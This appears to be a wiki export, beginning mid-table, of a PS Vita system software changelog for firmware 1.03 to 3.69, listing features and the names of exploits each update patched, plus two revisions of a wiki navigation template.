* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several savegame exploits (Fieldrunners and other, previously undisclosed, titles) have been fixed, disallowing the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various publicly known exploit titles have been fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles have been fixed as well.<br />
* Internal firmware changes now prevent larger payloads (e.g. TN-V/ARK eCFW) from being run via exploits in PSP Minis that lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*The "no entry" icon has been changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the 256 MB of memory reserved for the operating system is now available to games.<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploits.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed some bugs in SceNgs.<br />
*SSL library updated (along with other networking libraries that use SceSsl); two new root certificates added.<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Template:System&diff=9075Template:System2018-11-06T04:11:25Z<p>Xyz: </p>
<hr />
<div>{{Navbox<br />
|name = System<br />
|title = System<br />
|image = <br />
<br />
|group1 = [[Kernel]]<br />
|list1 = [[File Management]] {{·}} [[Concurrency]] {{·}} [[Interrupts]] {{·}} [[Syscalls]] {{·}} [[SELF Loading]] {{·}} [[Modules#Kernel|Modules]] {{·}} [[Kermit]] {{·}} [[Suspend]] {{·}} [[Error codes]]<br />
<br />
|group2 = Boot<br />
|list2 = [[Security]] {{·}} [[Boot Sequence]] {{·}} [[Boot ROM]] {{·}} [[Kernel Loader]] {{·}} [[Sysroot]]<br />
<br />
|group3 = TrustZone<br />
|list3 = [[Secure World]] {{·}} [[SMC]] {{·}} [[Modules#Secure Kernel|Modules]] {{·}} [[F00D Commands]]<br />
<br />
|group4 = [[Applications]]<br />
|list4 = [[PSP Emulator]] {{·}} [[PSM]] {{·}} [[Web Browser]] {{·}} [[CMA]] {{·}} [[Updater]] {{·}} [[Modules#Application Libraries|Modules]]<br />
<br />
|group5 = Formats<br />
|list5 = [[ARZL]] {{·}} [[PSF]] {{·}} [[PSVIMG]] {{·}} [[Packages]] {{·}} [[PUP]] {{·}} [[PVF]] {{·}} [[SCE]] {{·}} [[SELF]] {{·}} [[SLB2]] {{·}} [[SCECAF]] {{·}} [[keystone]] {{·}} [[sealedkey]] {{·}} [[Syscon Update]] {{·}} [[Communication Processor Update Package|CP Update]] {{·}} [[act.dat]]<br />
<br />
|group6 = Encryption<br />
|list6 = [[Keys]] {{·}} [[Dmac5]]<br />
<br />
}}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Template:System&diff=9073Template:System2018-10-28T22:57:44Z<p>Xyz: </p>
<hr />
<div>{{Navbox<br />
|name = System<br />
|title = System<br />
|image = <br />
<br />
|group1 = [[Kernel]]<br />
|list1 = [[File Management]] {{·}} [[Concurrency]] {{·}} [[Interrupts]] {{·}} [[Syscalls]] {{·}} [[SELF Loading]] {{·}} [[Modules#Kernel|Modules]] {{·}} [[Kermit]] {{·}} [[Suspend]] {{·}} [[Error codes]]<br />
<br />
|group2 = Boot<br />
|list2 = [[Security]] {{·}} [[Boot Sequence]] {{·}} [[Boot ROM]] {{·}} [[Kernel Loader]] {{·}} [[Sysroot]]<br />
<br />
|group3 = TrustZone<br />
|list3 = [[Secure World]] {{·}} [[SMC]] {{·}} [[Modules#Secure Kernel|Modules]] {{·}} [[F00D Commands]]<br />
<br />
|group4 = [[Applications]]<br />
|list4 = [[PSP Emulator]] {{·}} [[PSM]] {{·}} [[Web Browser]] {{·}} [[CMA]] {{·}} [[Updater]] {{·}} [[Modules#Application Libraries|Modules]]<br />
<br />
|group5 = Formats<br />
|list5 = [[ARZL]] {{·}} [[PSF]] {{·}} [[PSVIMG]] {{·}} [[Packages]] {{·}} [[PUP]] {{·}} [[PVF]] {{·}} [[SCE]] {{·}} [[SELF]] {{·}} [[SLB2]] {{·}} [[SCECAF]] {{·}} [[keystone]] {{·}} [[sealedkey]] {{·}} [[Syscon Update]] {{·}} [[Communication Processor Update Package]] {{·}} [[act.dat]]<br />
<br />
|group6 = Encryption<br />
|list6 = [[Keys]] {{·}} [[Dmac5]]<br />
<br />
}}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=8910System Software2018-09-11T14:29:55Z<p>Xyz: /* Version 3 */</p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists has been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and many other vulnerabilities.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
* [Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
